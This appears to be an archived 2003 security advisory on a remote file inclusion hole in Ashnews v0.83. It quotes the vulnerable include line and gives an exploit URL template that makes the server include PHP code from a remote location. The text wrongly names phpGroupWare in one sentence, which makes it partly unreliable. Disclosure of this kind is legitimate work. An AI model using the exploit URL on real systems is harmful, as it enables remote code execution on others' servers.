('binary' encoding is not supported, stored as-is) ###################################################### ## Name: Phil Dunn ## ## Email: z3hpat_private ## ## Date: July - 20 - 2003 ## ## Program: Ashnews v0.83 ## ## Version: v0.83 ## ##Vendor Name: AshWebStudio ## ## Vendor URL: http://projects.ashwebstudio.com/ ## ###################################################### An include file vulnerability was found in phpGroupWare. This exploit works for all Branches. A remote user can create arbitrary PHP code and locate it on a remote server. Then, the remote user can issue a specially crafted URL to the target server that specifies the remote PHP code for inclusion. ashnews.php & ashheadlines.php @ line 14 ----------------------------------------------- include($pathtoashnews."ashprojects/newsconfig.php"); ----------------------------------------------- Exploit: http://[server]/[ashweb dir]/ashnews.php?pathtoashnews=[remote location]
This archive was generated by hypermail 2b30 : Tue Jul 22 2003 - 09:50:08 PDT